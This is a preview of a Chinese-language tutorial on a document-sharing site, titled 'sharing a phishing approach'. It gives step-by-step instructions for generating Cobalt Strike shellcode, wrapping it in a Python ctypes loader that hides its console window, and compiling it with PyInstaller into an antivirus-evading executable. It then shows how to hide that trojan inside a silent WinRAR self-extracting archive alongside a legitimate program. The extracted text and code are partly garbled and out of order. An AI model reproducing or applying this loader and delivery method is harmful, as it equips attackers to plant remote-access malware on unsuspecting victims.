記一次釣魚思路分享 作者mature_W_第1頁
記一次釣魚思路分享 作者mature_W_第2頁
記一次釣魚思路分享 作者mature_W_第3頁
記一次釣魚思路分享 作者mature_W_第4頁
記一次釣魚思路分享 作者mature_W_第5頁
已閱讀5頁,還剩12頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)

文檔簡介

1、記一次釣魚思路分享 作者:Mature原文鏈接:/s/SFS-qgplnnObEQRKWCWa4w本文由 干貨 收集整理:/test/index.php前些天看文章學(xué)到的,分享給大家! 還有大家平時下載東西一定要到官方網(wǎng)站下載,不要隨意打開別人發(fā)你的exe或其他可執(zhí)行文件!一、制作一個免殺馬:我們直接使用cs或者msfvenom生成payload殺軟肯定會直接殺,所以我們可以利用這倆個工具生成一段shellcode.然后自己寫一個加載器,最后再利用該語言的特性將其編譯成exe. 這里我以python為例:1、利用

2、cs生成shellcode:(1) 首先建立一個器:Cobalt Strike-Listeners出現(xiàn)下圖畫面:17然后點擊Add添加,端口和名字自己寫一個,注意端口不要被占用 (2) 生成payload:然后出現(xiàn)payload生成類型以及 器選擇:這里我們用python,如果目標(biāo)機(jī)器是64位的可以勾選Use x64 payload,32位的默認(rèn)即可(64位系統(tǒng)能兼容大部分32位的軟件,所以64位的機(jī)器也可以不使用x64 payload)(3) 然后點擊Generate,后會生成一個py腳本,內(nèi)容如下:2、在我們的攻擊機(jī)上安裝好Pyinstaller3、利用python的Pyinstaller

3、將以下腳本打包成exe:from ctypes import * import ctypes# length: 891 bytes buf = xxx#libc = CDLL(libc.so.6) PROT_READ = 1PROT_WRITE = 2PROT_EXEC = 4def executable_code(buffer): buf = c_char_p(buffer) size = len(buffer)addr = libc.valloc(size) addr = c_void_p(addr)(1) 將我們生成的shellcode替換掉即可(也就是將buf = xxx替換成剛剛生成

4、的那串)if 0 = addr:raise Exception(Failed to allocate memory) memmove(addr, buf, size)if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC): raise Exception(Failed to set protection on buffer)return addrVirtualAlloc = ctypes.windll.kernel32.VirtualAlloc VirtualProtect = ctypes.wi

5、ndll.kernel32.VirtualProtect shellcode = bytearray(buf)whnd = ctypes.windll.kernel32.GetConsoleWindow() if whnd != 0:if 666=666:ctypes.windll.user32.ShowWindow(whnd, 0) ctypes.windll.kernel32.CloseHandle(whnd)print *666memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_in

6、t(len(shellcode), ctypes.c_int(0x3000), ctypes.c_int(0x40)buf = (ctypes.c_char * len(shellcode).from_buffer(shellcode) old = ctypes.c_long(1)VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode),0x40,ctypes.byref(old) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),buf, ctyp

7、es.c_int(len(shellcode)shell = cast(memorywithshell, CFUNCTYPE(c_void_p) shell()(2) 進(jìn)入到pyinstaller所在目錄(默認(rèn)安裝后在Scripts目錄下),然后運(yùn)行:參數(shù)解釋:/weixin_39000819/article/details/80942423包進(jìn)該exe內(nèi))-F:輸出為單個文件(會把所有的第三方依賴、資源和代碼均-i:指定圖標(biāo) -w:隱藏控制臺 pyinstaller參數(shù)可參考:運(yùn)行后等待結(jié)束會在dist目錄下生成一個exe文件(就是我們打包好的免殺馬)

8、:生成的exe:世界殺毒網(wǎng)檢測效果:4、運(yùn)行效果:運(yùn)行后什么也不顯示,但是我們這邊已經(jīng)成功上線了.可以看到是相當(dāng)隱蔽的. 這 個 免 殺 是 參 考 以 下 文 章 的 : /webstudy/penetration/22.html二、將我們的免殺馬和其他程序結(jié)合起來:再結(jié)合下winrar的自解壓會更不容易讓人發(fā)現(xiàn):1、將我們剛剛生成的馬和我們想要的正常exe一起添加到壓縮包中(我這里用winrar舉例,其他壓縮軟件也有此功能):選擇創(chuàng)建自解壓格式 2、然后選擇 高級 下的自解壓選項,3、相關(guān)的設(shè)置:(1) 設(shè)置自解壓的路徑(最好選擇一個任意用戶都有權(quán)限訪問的目錄):我這里就用:C:WindowsTemp(2) 設(shè)置木馬正常程序的運(yùn)行先后順序:因為解壓后我們的保存到我們設(shè)置的目錄,所以這里的路徑要對應(yīng).(3) 設(shè)置是否顯示自解壓提示:選擇全部隱藏后,運(yùn)行該自解壓文件后會不顯示自解壓提示直接解壓,比較隱蔽!(4) 設(shè)置更新:這里設(shè)置主要是為了防止目標(biāo)路徑下存在相同文件.(5) 設(shè)置生成自解壓文件的圖標(biāo):然后點擊確定后即可生成.(6) 生成的自解壓文件與正

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論